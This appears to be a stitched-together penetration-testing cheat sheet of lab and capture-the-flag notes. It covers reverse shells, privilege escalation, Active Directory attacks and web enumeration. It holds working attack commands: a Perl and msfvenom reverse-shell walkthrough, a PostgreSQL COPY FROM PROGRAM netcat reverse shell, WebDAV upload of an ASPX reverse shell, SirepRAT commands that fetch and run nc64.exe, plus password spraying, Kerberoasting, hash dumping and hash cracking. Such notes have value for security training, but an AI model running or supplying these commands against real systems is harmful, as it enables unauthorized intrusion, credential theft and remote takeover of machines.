$ tar zxvf perl-reverse-shell-1.0.tar.gz
$ cd perl-reverse-shell-1.0
$ vim perl-reverse-shell.pl # set IP and PORT at lines 45 and 46
Once prepared, upload the reverse shell on the target machine using the meterpreter
meterpreter > upload perl-reverse-shell.pl /tmp/perl-reverse-shell.pl
[*] uploading : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl
[*] uploaded : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl
On the attacker machine, start listening
$ nc -nvp 9876
listening on [any] 9876 ...
while on the victim machine, execute the Perl script
meterpreter > shell
Process 2 created.
Channel 3 created.
perl /tmp/perl-reverse-shell.pl
Content-Length: 0
Connection: close
Content-Type: text/html
Content-Length: 43
Connection: close
Content-Type: text/html
Sent reverse shell to 10.0.100.245:9876<p>
On the attacker machine you should see something like that
connect to [10.0.100.245] from canyoupwnme.pentest [10.0.100.195] 53929
12:24:48 up 55 min, 0 users, load average: 0.00, 0.01, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
/
/usr/sbin/apache: 0: can't access tty; job control turned off
$
Spawn a tty shell
$ python -c "import pty; pty.spawn('/bin/bash');"
tomcat7@canyoupwnme:/$ whoami
whoami
tomcat7
tomcat7@canyoupwnme:/$ id
id
uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7)
$ mkdir tmp
$ cd tmp
$ wget https://www.exploit-db.com/download/39166 -O ofs.c
$ gcc ofs.c -o ofs.bin
$ ./ofs.bin
# id
# uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin),1000(user)
GDB
Upload Rev Shell Elf
Hacktricks has a page on exploiting gdbserver. I suspect at least the first technique was tested on Backdoor (given the use of port 1337 and the location of /home/user). This technique is to create an elf, and then upload it to the remote debugger and run it there.
I’ll create a simple reverse shell payload with msfvenom:
oxdf@hacky$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 PrependFork=true -f elf -o rev.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 106 bytes
Final size of elf file: 226 bytes
Saved as: rev.elf
Next, I’ll start debugging it locally:
oxdf@hacky$ gdb -q rev.elf
Reading symbols from rev.elf...
(No debugging symbols found in rev.elf)
(gdb)
Now connect to the remote server:
(gdb) target extended-remote 10.10.11.125:1337
Remote debugging using 10.10.11.125:1337
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
Reading symbols from target:/lib64/ld-linux-x86-64.so.2...
Reading /lib64/ld-2.31.so from remote target...
Reading /lib64/.debug/ld-2.31.so from remote target...
Reading /usr/lib/debug//lib64/ld-2.31.so from remote target...
Reading /usr/lib/debug/lib64//ld-2.31.so from remote target...
Reading target:/usr/lib/debug/lib64//ld-2.31.so from remote target...
(No debugging symbols found in target:/lib64/ld-linux-x86-64.so.2)
0x00007ffff7fd0100 in ?? () from target:/lib64/ld-linux-x86-64.so.2
With that connection, I can upload the binary:
(gdb) remote put rev.elf /dev/shm/rev
Successfully sent file "rev.elf".
Now I just need to set the remote debugging target to that file, and run it:
(gdb) set remote exec-file /dev/shm/rev
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program:
Reading /dev/shm/rev from remote target...
Reading /dev/shm/rev from remote target...
Reading symbols from target:/dev/shm/rev...
(No debugging symbols found in target:/dev/shm/rev)
[Detaching after fork from child process 33603]
[Inferior 1 (process 33592) exited normally]
When that finishes, there’s a connection at my listening nc:
oxdf@hacky$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.125 46586
id
uid=1000(user) gid=1000(user) groups=1000(user)
I’ll do a shell upgrade with script:
script /dev/null -c bash
Script started, file is /dev/null
user@Backdoor:/home/user$ ^Z
[1]+ Stopped nc -lnvp 443
oxdf@hacky$ stty raw -echo ; fg
nc -lnvp 443
reset
reset: unknown terminal type unknown
Terminal type? screen
user@Backdoor:/home/user$
I’m told that there may be issues running gdb with a different version than the server. I didn’t have any issues, but in this case my VM and the target are both Ubuntu 20.04. If you have issues from Kali or Parrot, that may be the problem.
IRC 6697/8067/65534
use hexchat to interact with these possible chats. (it is a program in linux, so just search for it like burp, no command line)
☐ Create a network after the name of the box. Make your username root or whatever.
☐ select the network and click Edit, update the server to point to 10.10.10.10/6697
Select name of chat and click connect, Click Open the channel list.
psql 5432
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.186 80 >/tmp/f';
Active Directory
Enumeration Checklist:
♦
What is the domain?
SMB CrackMapExec
☐ crackmapexec smb 10.10.10.10 will always show the host name and domain name. Add this to your /etc/hosts file
☐ Add any host names you find in enumeration to the /etc/hosts file in the format 10.10.10.10 hostname.domainname.com hostname
Also add the domain to the domain controller ip in your /etc/hosts file in the format 10.10.10.10 domainname.com
♦
What is the host name/Is DNS running on port 53?
SMB CrackMapExec
☐ crackmapexec smb 10.10.10.10 will always show the host name and domain name. Add this to your /etc/hosts file
Zone Transfer
☐ dig axfr @10.10.10.10 domain.htb try this before doing the below commands. Only do below if you are desperate on enumeration
☐ you need the domain.htb so guess if you do not know
Nslookup
☐ If it does not appear in nmap you can try starting nslookup with nslookup and setting the server value to your target with server 10.10.10.10
☐ If it hangs then it is time to move onto dnsrecon - try your local host 127.0.0.1 as the value to verify it even works
DNS
☐ we will also attempt to lookup any info, bruteforce subdomains, and attempt zone transfers with dnsenum --dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o scans/dnsenum-bitquark-intelligence.htb intelligence.htb dnsenum VERSION:1.2.6
♦
Got a list of names to check?
We can first take our list of first name last name and turn it into the most popular naming conventions for AD
Go to /programs/kerbrute and input your list of names into NamesForADGenerator.txt in firstname,lastname order then run:
☐ python3 ADGenerator.py NamesForADGenerator.py
Use this new file of potential usernames and Kerbrute to validate them.
☐ ./kerbrute_linux_amd64 userenum --dc iphere -d domain.name usernamesfromgenerator.txt
sync up your time: ntpdate 10.10.10.10 If you get no results. All negatives could mean it is failing just because your clock does not match the DC
♦
Is Kerberos open on port 88?
Kerbrute - syntax 1
Without creds, one thing I can check on Kerberos is brute-focing user names.
☐ kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175
If you do get any hits try and understand the naming convention to help in future bruteforcing
Kerbrute - syntax 2
we can try and bruteforce any username and password or use gathered usernames against possible passwords. For this we will use kerbrute in /programs/kerbrute. This program can also just be used to verify that usernames are valid on the domain. Use Filtering to help create a username list from recon.
☐ sync up your time: ntpdate 10.10.10.10
☐ run ./kerbrute_linux_amd64 -h to find what you need like -d for full domain or -dc for domain controller
☐ User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman
Brute Force ./kerbrute -d lab.ropnop.com bruteforce - reads username and password combinations (format username:password) from a file or stdin
use /usr/share/seclists for huge username and password lists
ASREP-Roasting
with Kerberos if I manage to find usernames I can try ASREP-roasting which can be abused if a user has the don't require preauth flag set.
☐ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams
☐ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
♦
Is LDAP open on port 389/636 open?
☐ ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts to get name information
we can also try searching with the dc, which the command above should also reveal, ldapsearch -h 10.10.10.248 -x -b "DC=intelligence,DC=htb"
☐ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous to dump all info to a file
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people to dump just people to a file
If you have credentials you can dump everything
☐ ldapdomaindump <IP> -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
☐ Search through the json files not html, as more data fields show up in the json files
Dump all info into a file, or second command just dumps users
☐ ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" > ldap-anonymous
ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)' > ldap-people
♦
Is SMB open on port 135/139/445 open?
☐ smbclient -L //10.10.10.10 -L is for list shares. ADMIN$ C$ IPC$ are all default shares
smbclient -U ‘’ -L //10.10.10.10 try guest anonymous and blank for the value of -U
☐ smbclient -N -L //10.10.10.10
☐ crackmapexec smb 172.16.115.6 -d relia.com -u jim -p 'Castello1!' --shares -M spider_plus
☐ cat /tmp/cme_spider_plus/172.16.115.6.json | jq '. | map_values(keys)'
☐ smbmap -H 10.10.10.10
smbmap -H 10.10.10.237 -u cookie -p cookie to try and login as a user that does not exist
☐ smbmap -R Replication -H 10.10.10.10 will recursively list all the files of that share
add the -A Groups.xml -q to search for all files of that value and download them. Attach to the end of the above string
☐ If it is old and you find a Groups.xml use gpp-decrpyt hashhere to decrypt passwords you may find
☐ smbclient -U relia\\jim //172.16.115.21/monitoring you have to add the domainname\\ before the username to log into AD smb
☐ If you get errors about “NT_STATUS_PASSWORD_MUST_CHANGE” Follow RPC steps below to change password
☐ run allinfo filename.txt on a file that appears to be zero bytes to see if it has any alternative data streams
☐ you can get it with get "Password.txt:Password" where after the semicolon specifies the alternative data stream to get
RPC
☐ rpcclient -U ‘’ -N 10.10.10.10 (troubleshoot by removing -N)
Run a few commands and if you get responses look up enumeration for this or look in MSRPC. Otherwise if you just get access denied there is nothing here
☐ run command enumdomusers and srvinfo in rpc
☐ copy the names, if it is successful, and use cat users.txt | awk -F\[ ‘{print $2}’ | awk -F \] ‘{print $1}’ > justnames.txt to strip them
Checkout descriptions of users with querydispinfo or for just one user use queryuser 0x1f4 (this number will be shown in enumdomusers)
☐ run command setuserinfo2 user_name 23 ‘NewPassword123’ in rpc to attempt password change of known user with a previously known password
☐ You can also attempt to reset a password with smbpasswd -U user_name -r 10.10.10.10
♦
What can we bruteforce?
Crack Map Exec
one option of the crack map exec suite is to bruteforce smb. We can use usernames gathered from enumeration and a password list from cewl or Hashcat
☐ crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
crackmapexec winrm 10.10.10.10 -u users.txt -p pw.txt --continue-on-success will bruteforce a list of usernames and passwords. Use --no-bruteforce to match the first username to the first password and so on. Otherwise it will bruteforce every username against every password which could lock accounts out. ports 5985 and 5986 must be open
☐ add the --local-auth flag to do local authentication instead. This is useful if you have new creds but they do not seem to unlock anything.
If The Above Fail Try Hydra
☐ hydra -L knownusernames -P knownpasswords -r rdp://172.16.244.12 as I have gotten many false negatives especially when bruteforcing rdp
Kerbrute
☐ Checkout Kerbrute under Kerberoast above
♦
Do we have credentials of some kind?
Even if you cannot crack the credentials you have, like an ntlm hash, use it in the same way as a password with cme
☐ crackmapexec smb/winrm/rdp/ssh/ 10.10.10.10 -u username -H hashhere --continue-on-success
SecretsDump.py
reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit
☐ secretsdump.py thepastamentors.com/NoodleSVC@10.10.10.15
ASREP-Roasting
with Kerberos if I manage to find usernames I can try ASREP-roasting which can be abused if a user has the don't require preauth flag set.
☐ GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175
GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams
☐ hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force
GetADUsers
If we get a username and a password/hash we can use GetADUsers.py to enumerate the domain more
☐ GetADUsers.py -all -dc-ip 10.10.10.10 active.htb/user_name:password_here add a hash you have with -hashes and remove :password_here
If you get an error try removing :password_here and inputting the password on prompt after running the command
Psexec
Is our user/username admin on any shares and therefore we can get a shell with psexec?
☐ psexec.py active.htb/user_name@10.10.10.10 and enter password on prompt. Should enumerate through all shares with credentials
SMB
Does our user have new access to an smb share we previously did not?
☐ crackmapexec smb 10.10.10.10 -u usersname -p password
☐ crackmapexec smb 10.10.10.10 -u usersname -p password -M spider_plus to automatically crawl through shares and list files you have access to
use cat /tmp/cme_spider_plus/10.10.10.10.json | jq ‘. | map_values(keys)’ to list all files in shares from this spider crawl
☐ smbmap -d active.htb -u user_name -p passwordhere123 -H 10.10.10.10
☐ Add the 10.10.10.10/ShareName -R at the end of the above command to list all files your user has access to
☐ smbclient -U relia\\jim //172.16.115.21/monitoring you have to add the domainname\\ before the username to log into AD smb
GetUserSPNs
Use the GetUserSPNs.py script from Impacket to get a list of service usernames which are associated with normal user accounts
☐ GetUserSPNs.py -request -dc-ip 10.10.10.10 active.htb/user_name -save -outputfile GetUserSPNs.out
☐ If you get a hash crack it with hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
WinRM
winrm leverages powershell remoting over tcp 5986 (https) or tcp 5985 (http)
☐ crackmapexec winrm 10.10.10.10 -u user_name -p ‘password123’ if you see pwned you can get a shell, otherwise it is just a valid login
☐ if you do see Pwn3d! then evil-winrm -i 192.168.200.220 -u username -p "password123!" to get a shell
BloodHound
Lets use python bloodhound to remotely gather information with our credentials (might want to download the latest version from github)
Collect all information on the domain (requires credential)
☐ bloodhound-python -u username -p password -d domain.tld -ns domain-controller-ip -c All can add --zip
on your kali machine, run
☐ neo4j console
If you need a login, it should be neo4j Minifiguresrcool2*
in another terminal (try troubleshooting as a not root user) run
☐ bloodhound
login with neo4j Minifiguresrcool2*
click the “upload data” icon and select your zip files
From the hamburger select whatever query you want
☐ Use cat 1231351_users.json | jq ‘.data[].Properties | select( .enabled == true) | .name’ -r > bloodhoundusers.txt to get a list of all valid usernames for password spraying with other tools
☐ cat bloodhoundusers.txt | awk -F@ ‘{print $1}’ > justnameusers.txt to remove the @domian.name of usernames
☐ Use cat 1231351_users.json | jq ‘.data[].Properties | select( .description != null) | .name + ": " + .description’ to get all users with a not null description
Find a user that is kerberoastable from bloodhound? Run this with the same credentials you used to gather bloodhound data with.
☐ GetUserSPNs.py intelligence.htb/Jose.Williams:Password123! -outputfile GetUserSPNuserhash
☐ crack it with hashcat GetUserSPNuserhash /usr/share/wordlists/rockyou.txt
♦
What Else Can We Check?
Responder
If you come across a script, port, dns record, that is using or possibly using credentials, see if you can catch those credentials with responder.
☐ responder -I tun0 which will start various servers, including http
dnstool.py
• -u intelligence\\Tiffany.Molina - The user to authenticate as;
• -p NewIntelligenceCorpUser9876 - The user’s password;
• --action add - Adding a new record;
• --record web-0xdf - The domain to add;
• --data 10.01.14.19 - The data to add, in this case, the IP to resolve web-0xdf to;
• --type A - The type of record to add.
☐ python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-0xdf --data 10.10.14.19 --type A intelligence.htb
This can be used with responder above in some situations
APIs
Web API Indicators
APIs meant for consumer use are meant to be easily discovered. Typically, the API provider will market their API to developers who want to be consumers. So, it will often be very easy to find APIs, just by using a web application as an end-user. The goal here is to find APIs to attack and this can be accomplished by discovering the API itself or the API documentation. If you can find the target's API and documentation as an end-user then mission accomplished, you have successfully discovered an API.
Another way to find an API provided by a target is to look around the target's landing page. Look through a landing page for links to API or development portal. When searching for APIs there are several signs that will indicate that you have discovered the existence of a web API. Be on the lookout for obvious URL naming schemes:
https://target-name.com/api/v1
https://api.target-name.com/v1
https://target-name.com/docs
https://dev.target-name.com/rest
Look for API indicators within directory names like:
/api, /api/v1, /v1, /v2, /v3, /rest, /swagger, /swagger.json, /doc, /docs, /graphql, /graphiql, /altair, /playground
Also, subdomains can also be indicators of web APIs:
api
.target-name.com
uat
.target-name.com
dev
.target-name.com
developer
.target-name.com
test
.target-name.com
Another indicator of web APIs is the HTTP request and response headers. The use of JSON or XML can be a good indicator that you have discovered an API.
HTTP Request and Response Headers containing "Content-Type: application/json, application/xml"
Also, watch for HTTP Responses that include statements like:
{"message": "Missing Authorization token"}
One of the most obvious indicators of an API would be through information gathered using third-Party Sources like Github and API directories.
Gitub:
https://github.com/
Postman Explore:
https://www.postman.com/explore/apis
ProgrammableWeb API Directory:
https://www.programmableweb.com/apis/directory
APIs Guru:
https://apis.guru/
Public APIs Github Project:
https://github.com/public-apis/public-apis
RapidAPI Hub:
https://rapidapi.com/search/
When searching for a target's APIs use a target's web application as it was designed. Use a browser go to the web application and see if an API is advertised. Once you have an idea of how the web app functions, dig deeper by deploying passive and active reconnaissance techniques.
Fuzzing
wfuzz
☐ wfuzz -u http://website.com/example.php -z range,445-447 -d ‘file-http:127.0.0.1:FUZZ&read=Scan+File’
ffuf
Subdomains
-fw means filter word length, run without this and see the Words: section is all the same. Use this to filter false positives
Directory Busting
☐ gobuster dir -u http://10.10.10.75:80/ --wordlist /usr/share/dirb/wordlists/big.txt -x aspx,php,txt,sh,cgi,pl,conf,cnf
☐ --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt try with this wordlist as well
/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
☐ dirbuster
☐ feroxbuster --url http://something.com:80/
☐ by default uses the worlist raft-medium-directories.txt
Dirbuster
☐ dirbuster
Input the target url, and select your word list. in the folder that this .txt file is found in is also several other good word lists
file extensions to add if you cannot find anything: sh, asp, aspx, cgi, txt, cnf, conf, pl
Gobuster
☐ gobuster dir -u http://10.10.10.75:80/ --wordlist /usr/share/dirb/wordlists/big.txt -x aspx,php,txt
Feroxbuster
☐ feroxbuster --url http://something.com:80/
☐ -x pdf, html, asp, aspx, php, txt, json, etc. to add extensions.
helpful settings:
--burp automatically proxy traffic to http://127.0.0.1:8080
Web Applications
Checklist For Website Enumeration
Start a dirbuster scan after glimpsing at the pages. This scan takes so long which is why.
☑ dirbuster > use usr/share/dirbuster/wordlists/medium lowercase
If nothing is found, run the search again with more file extensions like: sh, asp, aspx, cgi, txt, cnf, conf, html
If you cannot get any searching to work due to errors, Burp Suites Site Map feature
When you can't find anything, read through every single document - keep track of which ones you have been to in burp
☐ If you cannot find anything interesting, check that exploring the webpage did not reveal more folders and documents to explore
Also check for subdomains if you are running out of ideas
☑ gobuster vhost -u domain.com -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
guess what the domain.com is if you don't know
☐ Check the source code while waiting for directory scan
☑ Check the response headers for interesting information
☑ If ssl is active, view the certificate. Often times they will have FQDN in them to add to your /etc/hosts and have access to a different website
☐ View all page requests in burp, including the root /. You could be getting redirected to a page but the original page could still be shown in the response. This is an execution after redirect vulnerability.
☐ In burp click Action on a request, and select Do intercept > Response to this request. Change something like “302 Found” to “200 OK” to get it to load
If nmap returns a version of software look for an exploit
☐ use searchsploit -m exploit/path/name.txt to quickly copy your exploit into your current directory
EVEN IF SOMETHING looks like custom software or a random title google it anyways for exploits - oscp
If dealing with a login page look for
☑ Default credentials or credentials like admin admin
Use BurpSuite to bruteforce logins
files from dirbuster search which reveal user information
SQL injection
If you have a form where you can submit messages or other text try adding:
<img src="http://yourip/test"></img> and
<a href="http://yourip/">click me</a>
Setup a simple netcat listen on port 80 before submitting
☐ use davtest -url http://10.10.10.10 to test for file upload and file execution - especially if you have the put and move options from nmap scan
use cadaver 10.10.10.15 to interact with web dav
☐ maybe you can't upload and execute the file you need - try uploading the file as an allowed extension and moving it to the correct extension
To do this, change the request in burp from PUT or GET to MOVE /filename.html and directly underneath the first line add Destination: /filename.aspx
If your file upload extension is being blocked, try uploading it with a null byte. shell.aspx%00.jpg to trick it thinking it is a jpg
☐ Here is how to do it with curl:
— msfvenom -p windows/shell_reverse_tcp LHOST=lhost LPORT=lport -f aspx -o revshell.aspx
7. Rename the exploit to .txt file, coz we can only upload txt and html file
— mv revshell.aspx revshell.txt
8. Upload the exploit.txt file
— curl -X PUT http://granny.htb/revshell.txt — data-binary @revshell.txt
9. Rename the exploit.txt to revert back to aspx.
— curl -X MOVE — header ‘Destination:http://granny.htb/revshell.aspx' ‘http://granny.htb/revshell.txt'
10. Create a netcat shell to catch the reverse shell from the exploit.
— nc -nlvp 14143 and curl http://10.10.10.15/revshell.aspx
Drupal
If you find that drupal is running on a webserver there is a tool designed specifically for this called droopescan. This tool is 9 years old so I don't know how helpful this is anymore.
☐ droopescan scan drupal -u 10.10.10.10
☐ One of the default files in Drupal is /CHANGELOG.txt at the top you can see the latest version and publish date. then google drupal 7.54 exploits
WordPress
Directories to check out:
/wp-content
/wp-content/plugins
/wp-admin
/wp-login
Lookup any plugins you find for exploits
WP-Scan
☐ wpscan --url http://something.com --plugins-detection aggressive -e ap
(starts out in passive mode but that can miss things. -e ap is enumerate all plugins)
☐ you can do -e vp for enumerate vulnerable plugins instead
do -e u to enumerate users
!!!If you see things about api tokens, youll have to go to the wp-scan vuln website, sign it, get an api token, and run your wp-scan commands with:
☐ --api-token tokenhere at the end
Feroxbuster
☐ feroxbuster -u http://backdoor.htb/wp-content/plugins -w plugins.txt
Cookies
if you somehow get a valid login session with the values session_name, session_id, and token you can use the cookie editor plugin in firefox to add this cookie
☐ click on the cookie-editor extension, select add, and enter the session_name as the name and the session_id as the value. Browse your page to see if the session is valid
SESSd873f26fc11f2b7e6e4aa0f6fce59913=GCGJfJI7t9GIIV7M7NLK8ARzeURzu83jxeqI2_qcDGs some exploits want a cookie to exploit, like the example, and the format is session_name=session_id
Windows
☐ If you ping the device and the ttl (time to live) is around 128 it is a windows machine. The ttl decreases by one for every router it passes through so most commonly you will see 127
IoT Core
☐ python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd “C:\Windows\System32\hostname.exe” --v --return_output to verify execution
python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd “C:\Windows\System32\cmd.exe” --args “/c powershell hostname” --v --return_output to verify powershell execution
python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd “C:\Windows\System32\cmd.exe” --args “/c powershell IWR -Uri http://10.10.10.10:8000/nc64.exe -Outfile c:\nc64.exe” --v --return_output
☐ python3 SirepRAT.py 10.10.10.10 LaunchCommandWithOutput --cmd “C:\Windows\System32\cmd.exe” --args “/c c:\nc64.exe -e powershell 10.10.10.10 4444” --v --return_output
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\windows\system32\spool\drivers\color\nc.exe -uri http://10.10.14.24/nc64.exe'
Work through various windows downloading methods to try and download a reverse shell
IIS Versions
☐ by seeing what version of IIS is running you can know what type of windows is running
Linux
☐ If you ping the device and the ttl (time to live) is around 64 it is a linux machine. The ttl decreases by one for every router it passes through so most commonly you will see 63
Nessus
☐ systemctl start nessusd.service
https://127.0.0.1:8834
Git
Git Repository On Website
If you find a website that has a .git directory, or something that is a git directory, you can use
☐ git-dumper http://192.168.249.144/.git/ folder/to/put/in
To copy all the files locally. Change into that directory and then you can use git commands in it to view information
☐ git log to see all of the logs
☐ use git show commitnumberhere to view a certain commit
GitLab